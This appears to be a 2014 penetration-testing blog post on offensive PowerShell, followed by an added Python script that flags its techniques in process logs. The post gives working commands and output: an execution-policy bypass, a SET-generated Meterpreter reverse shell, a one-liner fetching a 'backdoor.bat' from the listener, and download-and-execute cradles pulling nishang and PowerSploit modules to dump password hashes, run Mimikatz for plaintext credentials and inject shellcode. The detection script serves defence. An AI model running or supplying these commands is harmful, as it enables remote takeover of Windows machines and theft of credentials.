DM_ 2014/10/27 10:32

0x00 PowerShell introduction


PowerShell is to Windows what bash is to Linux. It has the full power of the .NET Framework behind it and can call the Windows API directly, and since Windows 7 / Server 2008 it has shipped as part of the system. These capabilities make PowerShell very convenient both for Windows administration and for penetration testing.

0x01 PowerShell Execution Policy


By default, PowerShell scripts cannot be executed by double-clicking them or from CMD. There are ways to circumvent this policy at execution time. The easiest is to run powershell.exe with the command you want to execute appended, or to paste the script directly into a PowerShell window. Downloading and executing a script is also possible, as in the examples below.

If you need to execute a .ps1 file, you can also do this:

    PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1

Changing the execution policy globally by other means is not advised; choose whichever of the execution modes above suits the scenario at hand.

0x02 Reverse shell


When security software is present, you can have PowerShell execute shellcode to return a shell. The script can be generated with MSF or with the SET toolkit; note that MSF generates .ps1 files while SET generates .bat files. Here is the generation process in SET:

    Select from the menu:

       1) Social-Engineering Attacks
       2) Fast-Track Penetration Testing
       3) Third Party Modules
       4) Update the Metasploit Framework
       5) Update the Social-Engineer Toolkit
       6) Update SET configuration
       7) Help, Credits, and About

      99) Exit the Social-Engineer Toolkit

    set> 1

    ...SNIP...

    Select from the menu:

       1) Spear-Phishing Attack Vectors
       2) Website Attack Vectors
       3) Infectious Media Generator
       4) Create a Payload and Listener
       5) Mass Mailer Attack
       6) Arduino-Based Attack Vector
       7) SMS Spoofing Attack Vector
       8) Wireless Access Point Attack Vector
       9) QRCode Generator Attack Vector
      10) Powershell Attack Vectors
      11) Third Party Modules

      99) Return back to the main menu.

    set> 10

    The Powershell Attack Vector module allows you to create PowerShell specific attacks.
    These attacks will allow you to use PowerShell which is available by default in all
    operating systems Windows Vista and above. PowerShell provides a fruitful landscape
    for deploying payloads and performing functions that do not get triggered by
    preventative technologies.

       1) Powershell Alphanumeric Shellcode Injector
       2) Powershell Reverse Shell
       3) Powershell Bind Shell
       4) Powershell Dump SAM Database

      99) Return to Main Menu

    set:powershell>1
    set> IP address for the payload listener: 192.168.200.159
    set:powershell> Enter the port for the reverse [443]:4444
    [*] Prepping the payload for delivery and injecting alphanumeric shellcode...
    [*] Generating x86-based powershell injection code...
    [*] Finished generating powershell injection bypass.
    [*] Encoded to bypass execution restriction policy...
    [*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/
    set> Do you want to start the listener now [yes/no]: : yes

    ...SNIP...

    [*] Processing /root/.set/reports/powershell/powershell.rc for ERB directives.
    resource (/root/.set/reports/powershell/powershell.rc)> use multi/handler
    resource (/root/.set/reports/powershell/powershell.rc)> set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    resource (/root/.set/reports/powershell/powershell.rc)> set lport 4444
    lport => 4444
    resource (/root/.set/reports/powershell/powershell.rc)> set LHOST 0.0.0.0
    LHOST => 0.0.0.0
    resource (/root/.set/reports/powershell/powershell.rc)> exploit -j
    [*] Exploit running as background job.
    msf exploit(handler) >
    [*] Started reverse handler on 0.0.0.0:4444
    [*] Starting the payload handler...
    [*] Sending stage (769024 bytes) to 192.168.200.158
    [*] Meterpreter session 1 opened (192.168.200.159:4444 -> 192.168.200.158:49818) at 2014-10-23 18:17:35 +0800
    msf exploit(handler) > sessions

    Active sessions
    ===============

      Id  Type                   Information                               Connection
      --  ----                   -----------                               ----------
      1   meterpreter x86/win32  WIN-M49V8M0CSH2\server @ WIN-M49V8M0CSH2  192.168.200.159:4444 -> 192.168.200.158:49818 (192.168.200.158)

The generated files are under /root/.set/reports/powershell/. The .txt file there is actually a bat file: rename it and it can be run directly. Here is a trick: the file can be downloaded with a single PowerShell one-liner.

    powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.200.159/backdoor','backdoor.bat')

Then execute it to get the Meterpreter session.

From that session you can also run CMD commands and dump hashes or plaintext passwords.

0x03 Dumping hashes


Of course, if you only need to dump the hashes, PowerShell alone will do.

    powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1'); Get-PassHashes

0x04 Dumping plaintext passwords


Plaintext passwords can also be obtained by running the PowerShell version of Mimikatz, as follows.

    powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCerts

Note that Mimikatz commands can also be passed here through the Command parameter.

0x05 Memory dumping


PowerShell can also do what Procdump does: take a memory dump of a process. Here is a demonstration of dumping lsass.exe and then recovering plaintext credentials from the dump with Mimikatz.

The lsass dump file is then downloaded back and analyzed with Mimikatz to obtain the plaintext password.

Of course, memory dumps are good for more than Windows passwords: other important information or data may also be sitting in process memory. See blog.spiderlabs.com/2012/07/pen… for reference.

0x06 Executing shellcode


PowerShell can also execute shellcode, because its rich extension capabilities make calling Windows APIs very convenient. The process is as follows:

    powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -help

There is one problem here, though: there is little x64 shellcode around, and most shellcode collected online is x86. Running x86 shellcode directly from a 64-bit PowerShell produces an error.

By default, Invoke-Shellcode.ps1 injects the shellcode into the powershell.exe process itself. So on a 64-bit system, x86 shellcode can be executed through the 32-bit powershell.exe, as follows:

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Shellcode 0x90,0x90,0x90...

This process works for most shellcode generated by msfpayload. Of course, other methods can be used to execute shellcode on Windows, such as shellcodeexec, but that method does not bypass AV; you can adapt it based on its source code.
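As an added detection-side example (not part of the original post, which only shows the attacker's commands), the following Python script scans process-creation records for the observable traces of the techniques in sections 0x01 to 0x06: the -ExecutionPolicy Bypass flag, the DownloadFile/DownloadString download cradles, the PowerSploit and nishang module names, the 32-bit SysWOW64 PowerShell host, and a run of inline shellcode bytes. The tab-separated record layout, the hostnames, users and the sample lines are constructed for this example and are not a real Windows event format; in practice the command line comes from Security event 4688 with command-line auditing enabled, Sysmon event 1, or PowerShell script block logging (event 4104).

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Patterns for the PowerShell tradecraft described in the post. They are written
# for readability, not for resistance to obfuscation (encoded commands, string
# concatenation and aliases will slip past them).
INDICATORS: Dict[str, "re.Pattern"] = {
    "execution_policy_bypass": re.compile(r"-ExecutionPolicy\s+Bypass", re.I),
    "download_cradle": re.compile(r"\.Download(?:String|File)\(", re.I),
    "iex_remote_script": re.compile(r"\b(?:IEX|Invoke-Expression)\b.*\.DownloadString\(", re.I),
    "known_offensive_module": re.compile(
        r"Get-PassHashes|Invoke-Mimikatz|Invoke-Shellcode|PowerSploit|nishang", re.I),
    "syswow64_powershell": re.compile(r"\\SysWOW64\\WindowsPowerShell\\", re.I),
    # three or more comma-separated byte literals after -Shellcode
    "inline_shellcode_bytes": re.compile(
        r"-Shellcode\s+(?:0x[0-9a-f]{2}\s*,\s*){2,}0x[0-9a-f]{2}", re.I),
}


@dataclass
class ProcessEvent:
    """One process-creation record. The tab-separated layout is constructed
    for this example, not a real Windows or Sysmon event format."""
    timestamp: str
    host: str
    user: str
    image: str
    command_line: str


@dataclass
class Alert:
    event: ProcessEvent
    tags: List[str] = field(default_factory=list)

    @property
    def severity(self) -> str:
        tagset = set(self.tags)
        if tagset & {"known_offensive_module", "inline_shellcode_bytes"}:
            return "high"
        if tagset & {"download_cradle", "syswow64_powershell"}:
            return "medium"
        return "low"


def parse_event(line: str) -> ProcessEvent:
    """Parse 'timestamp<TAB>host<TAB>user<TAB>image<TAB>command line'.
    The command line is the last field, so tabs inside it survive."""
    fields = line.rstrip("\n").split("\t", 4)
    if len(fields) != 5:
        raise ValueError(f"malformed event: {line!r}")
    return ProcessEvent(*fields)


def classify(event: ProcessEvent) -> List[str]:
    """Return the indicator names that match the image path or command line."""
    haystack = f"{event.image} {event.command_line}"
    return [name for name, pat in INDICATORS.items() if pat.search(haystack)]


def scan(lines: List[str]) -> List[Alert]:
    """Run every non-empty record through the indicators; keep those that hit."""
    alerts: List[Alert] = []
    for line in lines:
        if not line.strip():
            continue
        event = parse_event(line)
        tags = classify(event)
        if tags:
            alerts.append(Alert(event, tags))
    return alerts


def _record(ts: str, host: str, user: str, image: str, cmd: str) -> str:
    # helper to build a constructed record in the example's own layout
    return "\t".join([ts, host, user, image, cmd])


PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample log: one benign admin command, then the command lines
# from the post as they would appear in process-creation telemetry.
SAMPLE_LOG = [
    _record("2014-10-27T10:32:00", "WS01", "alice", PS64,
            "powershell.exe -NoProfile -Command \"Get-Service | Where-Object Status -eq 'Running'\""),
    _record("2014-10-27T10:33:10", "WS01", "alice", PS64,
            r"PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1"),
    _record("2014-10-27T10:34:05", "WS02", "bob", PS64,
            "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.200.159/backdoor','backdoor.bat')"),
    _record("2014-10-27T10:35:40", "WS02", "bob", PS64,
            "powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/"
            "samratashok/nishang/master/Gather/Get-PassHashes.ps1'); Get-PassHashes"),
    _record("2014-10-27T10:36:12", "WS02", "bob", PS32,
            "powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/"
            "mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); "
            "Invoke-Shellcode -Shellcode 0x90,0x90,0x90,0x90"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        e = alert.event
        print(f"[{alert.severity:6}] {e.timestamp} {e.host} {e.user}: {', '.join(alert.tags)}")
```

The benign Get-Service invocation produces no alert, the bare -ExecutionPolicy Bypass run is rated low (it is common in legitimate automation), the DownloadFile one-liner is rated medium, and the two runs that pull nishang or PowerSploit modules are rated high. The severity ladder is a policy choice: in an environment where scripts are signed and the policy is AllSigned, the bypass flag alone may deserve medium.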

To be continued.